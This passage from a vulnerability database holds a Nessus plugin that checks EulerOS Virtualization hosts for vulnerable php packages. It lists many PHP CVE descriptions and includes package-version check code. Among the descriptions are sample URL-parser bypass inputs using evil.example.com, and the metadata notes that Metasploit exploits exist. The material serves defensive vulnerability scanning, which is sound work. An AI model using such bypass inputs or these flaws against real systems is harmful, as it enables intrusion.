image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.(CVE-2019-11047)\n\n - PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead of the port number in the second argument of the function.(CVE-2017-7272)\n\n - When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.(CVE-2019-11050)\n\n - An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function fetch_interval_quantifier (formerly known as fetch_range_quantifier) in regparse.c, PFETCH is called without checking PEND.\n This leads to a heap-based buffer over-read.(CVE-2019-19204)\n\n - An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an uninitialized read in exif_process_IFD_in_TIFF.(CVE-2019-9641)\n\n - Double free vulnerability in the php_wddx_process_data function in wddx.c in the WDDX extension in PHP before 5.5.37, 5.6.x before 5.6.23, and 7.x before 7.0.8 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via crafted XML data that is mishandled in a wddx_deserialize call.(CVE-2016-5772)\n\n - Multiple integer overflows in the mbfl_strcut function in ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted mb_strcut call.(CVE-2016-4073)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-07-01T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.6.0 : php (EulerOS-SA-2020-1747)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4718", "CVE-2014-9767", "CVE-2014-9912", "CVE-2015-4116", "CVE-2015-5161", "CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-7803", "CVE-2015-7804", "CVE-2015-8866", "CVE-2015-8867", "CVE-2015-8874", "CVE-2015-8879", "CVE-2015-8935", "CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10161", "CVE-2016-10397", "CVE-2016-2554", "CVE-2016-3141", "CVE-2016-3142", "CVE-2016-3185", "CVE-2016-4070", "CVE-2016-4073", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4542", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5772", "CVE-2016-6288", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7128", "CVE-2016-7412", "CVE-2016-7414", "CVE-2016-7418", "CVE-2016-9934", "CVE-2016-9935", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-16642", "CVE-2017-7272", "CVE-2017-9226", "CVE-2018-10545", "CVE-2018-10547", "CVE-2018-14851", "CVE-2018-17082", "CVE-2018-5711", "CVE-2018-5712", "CVE-2019-11041", "CVE-2019-11042", "CVE-2019-11043", "CVE-2019-11047", "CVE-2019-11050", "CVE-2019-19204", "CVE-2019-19246", "CVE-2019-9641"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:php", "p-cpe:/a:huawei:euleros:php-cli", "p-cpe:/a:huawei:euleros:php-common", "cpe:/o:huawei:euleros:uvp:3.0.6.0"], "id": "EULEROS_SA-2020-1747.NASL", "href": "https://www.tenable.com/plugins/nessus/137966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137966);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2011-4718\",\n \"CVE-2014-9767\",\n \"CVE-2014-9912\",\n \"CVE-2015-4116\",\n \"CVE-2015-6831\",\n \"CVE-2015-6832\",\n \"CVE-2015-6833\",\n \"CVE-2015-7803\",\n \"CVE-2015-7804\",\n \"CVE-2015-8866\",\n \"CVE-2015-8867\",\n \"CVE-2015-8874\",\n \"CVE-2015-8879\",\n \"CVE-2015-8935\",\n \"CVE-2016-10158\",\n \"CVE-2016-10159\",\n \"CVE-2016-10161\",\n \"CVE-2016-10397\",\n \"CVE-2016-2554\",\n \"CVE-2016-3141\",\n \"CVE-2016-3142\",\n \"CVE-2016-3185\",\n \"CVE-2016-4070\",\n \"CVE-2016-4073\",\n \"CVE-2016-4539\",\n \"CVE-2016-4540\",\n \"CVE-2016-4542\",\n \"CVE-2016-5093\",\n \"CVE-2016-5094\",\n \"CVE-2016-5772\",\n \"CVE-2016-6288\",\n \"CVE-2016-6291\",\n \"CVE-2016-6292\",\n \"CVE-2016-6294\",\n \"CVE-2016-7124\",\n \"CVE-2016-7125\",\n \"CVE-2016-7128\",\n \"CVE-2016-7412\",\n \"CVE-2016-7414\",\n \"CVE-2016-7418\",\n \"CVE-2016-9934\",\n \"CVE-2016-9935\",\n \"CVE-2017-11143\",\n \"CVE-2017-11144\",\n \"CVE-2017-11145\",\n \"CVE-2017-11147\",\n \"CVE-2017-11628\",\n \"CVE-2017-12933\",\n \"CVE-2017-16642\",\n \"CVE-2017-7272\",\n \"CVE-2017-9226\",\n \"CVE-2018-10545\",\n \"CVE-2018-10547\",\n \"CVE-2018-14851\",\n \"CVE-2018-17082\",\n \"CVE-2018-5711\",\n \"CVE-2018-5712\",\n \"CVE-2019-11041\",\n \"CVE-2019-11042\",\n \"CVE-2019-11043\",\n \"CVE-2019-11047\",\n \"CVE-2019-11050\",\n \"CVE-2019-19204\",\n \"CVE-2019-19246\",\n \"CVE-2019-9641\"\n );\n script_bugtraq_id(61929);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"EulerOS Virtualization 3.0.6.0 : php (EulerOS-SA-2020-1747)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the php packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and\n 7.3.x below 7.3.8 it is possible to supply it with data\n what will cause it to read past the allocated buffer.\n This may lead to information disclosure or\n crash.(CVE-2019-11042)\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and\n 7.3.x below 7.3.8 it is possible to supply it with data\n what will cause it to read past the allocated buffer.\n This may lead to information disclosure or\n crash.(CVE-2019-11041)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x\n before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before\n 7.2.1. There is Reflected XSS on the PHAR 404 error\n page via the URI of a request for a .phar\n file.(CVE-2018-5712)\n\n - gd_gif_in.c in the GD Graphics Library (aka libgd), as\n used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x\n before 7.1.13, and 7.2.x before 7.2.1, has an integer\n signedness error that leads to an infinite loop via a\n crafted GIF file, as demonstrated by a call to the\n imagecreatefromgif or imagecreatefromstring PHP\n function. This is related to GetCode_ and\n gdImageCreateFromGifCtx.(CVE-2018-5711)\n\n - The Apache2 component in PHP before 5.6.38, 7.0.x\n before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before\n 7.2.10 allows XSS via the body of a 'Transfer-Encoding:\n chunked' request, because the bucket brigade is\n mishandled in the php_handler function in\n sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP\n before 5.6.37, 7.0.x before 7.0.31, 7.1.x before\n 7.1.20, and 7.2.x before 7.2.8 allows remote attackers\n to cause a denial of service (out-of-bounds read and\n application crash) via a crafted JPEG\n file.(CVE-2018-14851)\n\n - An issue was discovered in ext/phar/phar_object.c in\n PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before\n 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS\n on the PHAR 403 and 404 error pages via request data of\n a request for a .phar file. NOTE: this vulnerability\n exists because of an incomplete fix for\n CVE-2018-5712.(CVE-2018-10547)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x\n before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before\n 7.2.4. Dumpable FPM child processes allow bypassing\n opcache access controls because fpm_unix.c makes a\n PR_SET_DUMPABLE prctl call, allowing one user (in a\n multiuser environment) to obtain sensitive information\n from the process memory of a second user's PHP\n applications by running gcore on the PID of the PHP-FPM\n worker process.(CVE-2018-10545)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, a stack-based buffer overflow in the\n zend_ini_do_op() function in Zend/zend_ini_parser.c\n could cause a denial of service or potentially allow\n executing code. NOTE: this is only relevant for PHP\n applications that accept untrusted input (instead of\n the system's php.ini file) for the parse_ini_string or\n parse_ini_file function, e.g., a web application for\n syntax validation of php.ini\n directives.(CVE-2017-11628)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.26 and 7.x before 7.0.11 allows\n remote attackers to cause a denial of service (invalid\n pointer access and out-of-bounds read) or possibly have\n unspecified other impact via an incorrect boolean\n element in a wddxPacket XML document, leading to\n mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - The exif_process_IFD_in_TIFF function in\n ext/exif/exif.c in PHP before 5.6.25 and 7.x before\n 7.0.10 mishandles the case of a thumbnail offset that\n exceeds the file size, which allows remote attackers to\n obtain sensitive information from process memory via a\n crafted TIFF image.(CVE-2016-7128)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x\n before 7.0.10 skips invalid session names in a way that\n triggers incorrect parsing, which allows remote\n attackers to inject arbitrary-type session data by\n leveraging control of a session name, as demonstrated\n by object injection.(CVE-2016-7125)\n\n - The locale_accept_from_http function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.38,\n 5.6.x before 5.6.24, and 7.x before 7.0.9 does not\n properly restrict calls to the ICU\n uloc_acceptLanguageFromHTTP function, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a call with a long argument.(CVE-2016-6294)\n\n - The exif_process_user_comment function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (NULL pointer dereference and\n application crash) via a crafted JPEG\n image.(CVE-2016-6292)\n\n - The exif_process_IFD_in_MAKERNOTE function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (out-of-bounds array access\n and memory corruption), obtain sensitive information\n from process memory, or possibly have unspecified other\n impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The php_url_parse_ex function in ext/standard/url.c in\n PHP before 5.5.38 allows remote attackers to cause a\n denial of service (buffer over-read) or possibly have\n unspecified other impact via vectors involving the\n smart_str data type.(CVE-2016-6288)\n\n - Integer overflow in the phar_parse_pharfile function in\n ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before\n 7.0.15 allows remote attackers to cause a denial of\n service (memory consumption or application crash) via a\n truncated manifest entry in a PHAR\n archive.(CVE-2016-10159)\n\n - It was found that the exif_convert_any_to_int()\n function in PHP was vulnerable to floating point\n exceptions when parsing tags in image files. A remote\n attacker with the ability to upload a malicious image\n could crash PHP, causing a Denial of\n Service.(CVE-2016-10158)\n\n - Stack consumption vulnerability in GD in PHP before\n 5.6.12 allows remote attackers to cause a denial of\n service via a crafted imagefilltoborder\n call.(CVE-2015-8874)\n\n - ext/libxml/libxml.c in PHP before 5.5.22 and 5.6.x\n before 5.6.6, when PHP-FPM is used, does not isolate\n each thread from libxml_disable_entity_loader changes\n in other threads, which allows remote attackers to\n conduct XML External Entity (XXE) and XML Entity\n Expansion (XEE) attacks via a crafted XML document, a\n related issue to CVE-2015-5161.(CVE-2015-8866)\n\n - A flaw was found in the way the way PHP's Phar\n extension parsed Phar archives. A specially crafted\n archive could cause PHP to crash or, possibly, execute\n arbitrary code when opened.(CVE-2015-7804)\n\n - A flaw was found in the way the way PHP's Phar\n extension parsed Phar archives. A specially crafted\n archive could cause PHP to crash or, possibly, execute\n arbitrary code when opened.(CVE-2015-7803)\n\n - Use-after-free vulnerability in the spl_ptr_heap_insert\n function in ext/spl/spl_heap.c in PHP before 5.5.27 and\n 5.6.x before 5.6.11 allows remote attackers to execute\n arbitrary code by triggering a failed\n SplMinHeap::compare operation.(CVE-2015-4116)\n\n - The get_icu_disp_value_src_php function in\n ext/intl/locale/locale_methods.c in PHP before 5.3.29,\n 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not\n properly restrict calls to the ICU uresbund.cpp\n component, which allows remote attackers to cause a\n denial of service (buffer overflow) or possibly have\n unspecified other impact via a locale_get_display_name\n call with a long first argument.(CVE-2014-9912)\n\n - The header() PHP function allowed header stings\n containing line break followed by a space or tab, as\n allowed by RFC 2616. Certain browsers handled the\n continuation line as new header, making it possible to\n conduct a HTTP response splitting attack against such\n browsers. The header() function was updated to follow\n RFC 7230 and not allow any line breaks.(CVE-2015-8935)\n\n - The openssl_random_pseudo_bytes function in\n ext/openssl/openssl.c in PHP before 5.4.44, 5.5.x\n before 5.5.28, and 5.6.x before 5.6.12 incorrectly\n relies on the deprecated RAND_pseudo_bytes function,\n which makes it easier for remote attackers to defeat\n cryptographic protection mechanisms via unspecified\n vectors.(CVE-2015-8867)\n\n - A flaw was found in the way the way PHP's Phar\n extension parsed Phar archives. A specially crafted\n archive could cause PHP to crash or, possibly, execute\n arbitrary code when opened.(CVE-2015-6833)\n\n - A flaw was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-6832)\n\n - Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in\n PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x\n before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before\n 3.12.1 allows remote attackers to create arbitrary\n empty directories via a crafted ZIP\n archive.(CVE-2014-9767)\n\n - In PHP before 5.6.31, an invalid free in the WDDX\n deserialization of boolean parameters could be used by\n attackers able to inject XML for deserialization to\n crash the PHP interpreter, related to an invalid free\n for an empty boolean element in\n ext/wddx/wddx.c.(CVE-2017-11143)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.29 and 7.x before 7.0.14 allows\n remote attackers to cause a denial of service\n (out-of-bounds read and memory corruption) or possibly\n have unspecified other impact via an empty boolean\n element in a wddxPacket XML document.(CVE-2016-9935)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before\n 7.0.13 allows remote attackers to cause a denial of\n service (NULL pointer dereference) via crafted\n serialized data in a wddxPacket XML document, as\n demonstrated by a PDORow string.(CVE-2016-9934)\n\n - The ZIP signature-verification feature in PHP before\n 5.6.26 and 7.x before 7.0.11 does not ensure that the\n uncompressed_filesize field is large enough, which\n allows remote attackers to cause a denial of service\n (out-of-bounds memory access) or possibly have\n unspecified other impact via a crafted PHAR archive,\n related to ext/phar/util.c and\n ext/phar/zip.c.(CVE-2016-7414)\n\n - Integer overflow in the php_html_entities function in\n ext/standard/html.c in PHP before 5.5.36 and 5.6.x\n before 5.6.22 allows remote attackers to cause a denial\n of service or possibly have unspecified other impact by\n triggering a large output string from the\n htmlspecialchars function.(CVE-2016-5094)\n\n - The get_icu_value_internal function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.36,\n 5.6.x before 5.6.22, and 7.x before 7.0.7 does not\n ensure the presence of a '\\\\0' character, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a crafted locale_get_primary_language\n call.(CVE-2016-5093)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 does not properly construct spprintf arguments,\n which allows remote attackers to cause a denial of\n service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header\n data.(CVE-2016-4542)\n\n - The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP before\n 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6\n allows remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset.(CVE-2016-4540)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 allows remote attackers to cause a denial of\n service (buffer under-read and segmentation fault) or\n possibly have unspecified other impact via crafted XML\n data in the second argument, leading to a parser level\n of zero.(CVE-2016-4539)\n\n - ** DISPUTED ** Integer overflow in the\n php_raw_url_encode function in ext/standard/url.c in\n PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before\n 7.0.5 allows remote attackers to cause a denial of\n service (application crash) via a long string to the\n rawurlencode function. NOTE: the vendor says 'Not sure\n if this qualifies as security issue (probably\n not).'(CVE-2016-4070)\n\n - The phar_parse_zipfile function in zip.c in the PHAR\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service\n (out-of-bounds read and application crash) by placing a\n PK\\\\x05\\\\x06 signature at an invalid\n location.(CVE-2016-3142)\n\n - Use-after-free vulnerability in wddx.c in the WDDX\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to cause a denial of service\n (memory corruption and application crash) or possibly\n have unspecified other impact by triggering a\n wddx_deserialize call on XML data containing a crafted\n var element.(CVE-2016-3141)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in\n PHP before 5.6.12 mishandles driver behavior for\n SQL_WVARCHAR columns, which allows remote attackers to\n cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the\n odbc_fetch_array function to access a certain type of\n Microsoft SQL Server table.(CVE-2015-8879)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR\n archive handler could be used by attackers supplying\n malicious archive files to crash the PHP interpreter or\n potentially disclose information due to a buffer\n over-read in the phar_parse_pharfile function in\n ext/phar/phar.c.(CVE-2017-11147)\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25\n and 7.x before 7.0.10 mishandles certain invalid\n objects, which allows remote attackers to cause a\n denial of service or possibly have unspecified other\n impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method\n call.(CVE-2016-7124)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP\n before 5.5.32, 5.6.x before 5.6.18, and 7.x before\n 7.0.3 allows remote attackers to cause a denial of\n service (application crash) or possibly have\n unspecified other impact via a crafted TAR\n archive.(CVE-2016-2554)\n\n - A flaw was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-6831)\n\n - The make_http_soap_request function in\n ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before\n 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service (type\n confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method\n in ext/soap/soap.c.(CVE-2016-3185)\n\n - The object_common1 function in\n ext/standard/var_unserializer.c in PHP before 5.6.30,\n 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows\n remote attackers to cause a denial of service (buffer\n over-read and application crash) via crafted serialized\n data that is mishandled in a finish_nested_data\n call.(CVE-2016-10161)\n\n - The finish_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.6.31,\n 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to\n a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified\n impact on the integrity of PHP.(CVE-2017-12933)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, the openssl extension PEM sealing code\n did not check the return value of the OpenSSL sealing\n function, which could lead to a crash of the PHP\n interpreter, related to an interpretation conflict for\n a negative number in ext/openssl/openssl.c, and an\n OpenSSL documentation omission.(CVE-2017-11144)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A heap out-of-bounds write or read\n occurs in next_state_val() during regular expression\n compilation. Octal numbers larger than 0xff are not\n handled correctly in fetch_token() and\n fetch_token_in_cc(). A malformed regular expression\n containing an octal number in the form of '\\700' would\n produce an invalid code point value larger than 0xff in\n next_state_val(), resulting in an out-of-bounds write\n memory corruption.(CVE-2017-9226)\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24\n and 7.3.x below 7.3.11 in certain configurations of FPM\n setup it is possible to cause FPM module to write past\n allocated buffers into the space reserved for FCGI\n protocol data, thus opening the possibility of remote\n code execution.(CVE-2019-11043)\n\n - Session fixation vulnerability in the Sessions\n subsystem in PHP before 5.5.2 allows remote attackers\n to hijack web sessions by specifying a session\n ID.(CVE-2011-4718)\n\n - In PHP before 5.6.32, 7.x before 7.0.25, and 7.1.x\n before 7.1.11, an error in the date extension's\n timelib_meridian handling of 'front of' and 'back of'\n directives could be used by attackers able to supply\n date strings to leak information from the interpreter,\n related to ext/date/lib/parse_date.c out-of-bounds\n reads affecting the php_parse_date function. NOTE: this\n is a different issue than\n CVE-2017-11145.(CVE-2017-16642)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, an error in the date extension's\n timelib_meridian parsing code could be used by\n attackers able to supply date strings to leak\n information from the interpreter, related to\n ext/date/lib/parse_date.c out-of-bounds reads affecting\n the php_parse_date function. NOTE: the correct fix is\n in the e8b7698f5ee757ce2c8bd10a192a491a498f891c commit,\n not the bd77ac90d3bdf31ce2a5251ad92e9e75\n gist.(CVE-2017-11145)\n\n - In PHP before 5.6.28 and 7.x before 7.0.13, incorrect\n handling of various URI components in the URL parser\n could be used by attackers to bypass hostname-specific\n URL checks, as demonstrated by\n evil.example.com:80#@good.example.com/ and\n evil.example.com:80?@good.example.com/ inputs to the\n parse_url function (implemented in the php_url_parse_ex\n function in ext/standard/url.c).(CVE-2016-10397)\n\n - ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26\n and 7.x before 7.0.11 does not verify that a BIT field\n has the UNSIGNED_FLAG flag, which allows remote MySQL\n servers to cause a denial of service (heap-based buffer\n overflow) or possibly have unspecified other impact via\n crafted field metadata.(CVE-2016-7412)\n\n - Oniguruma through 6.9.3, as used in PHP 7.3.x and other\n products, has a heap-based buffer over-read in\n str_lower_case_match in regexec.c.(CVE-2019-19246)\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and\n 7.4.0 it is possible to supply it with data what will\n cause it to read past the allocated buffer. This may\n lead to information disclosure or\n crash.(CVE-2019-11047)\n\n - PHP through 7.1.11 enables potential SSRF in\n applications that accept an fsockopen or pfsockopen\n hostname argument with an expectation that the port\n number is constrained. Because a :port syntax is\n recognized, fsockopen will use the port number that is\n specified in the hostname argument, instead of the port\n number in the second argument of the\n function.(CVE-2017-7272)\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and\n 7.4.0 it is possible to supply it with data what will\n cause it to read past the allocated buffer. This may\n lead to information disclosure or\n crash.(CVE-2019-11050)\n\n - An issue was discovered in Oniguruma 6.x before\n 6.9.4_rc2. In the function fetch_interval_quantifier\n (formerly known as fetch_range_quantifier) in\n regparse.c, PFETCH is called without checking PEND.\n This leads to a heap-based buffer\n over-read.(CVE-2019-19204)\n\n - An issue was discovered in the EXIF component in PHP\n before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before\n 7.3.3. There is an uninitialized read in\n exif_process_IFD_in_TIFF.(CVE-2019-9641)\n\n - Double free vulnerability in the php_wddx_process_data\n function in wddx.c in the WDDX extension in PHP before\n 5.5.37, 5.6.x before 5.6.23, and 7.x before 7.0.8\n allows remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code\n via crafted XML data that is mishandled in a\n wddx_deserialize call.(CVE-2016-5772)\n\n - Multiple integer overflows in the mbfl_strcut function\n in ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP before\n 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allow\n remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code\n via a crafted mb_strcut call.(CVE-2016-4073)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1747\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dda25e7c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2554\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-9641\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"php-5.4.16-45.h30\",\n \"php-cli-5.4.16-45.h30\",\n \"php-common-5.4.16-45.h30\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-06T16:16:14", "description": "The remote host is running a version of macOS that is 10.12.x prior to 10.12.2. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - apache_mod_php\n - AppleGraphicsPowerManagement\n - Assets\n - Audio\n - Bluetooth\n - CoreCapture\n - 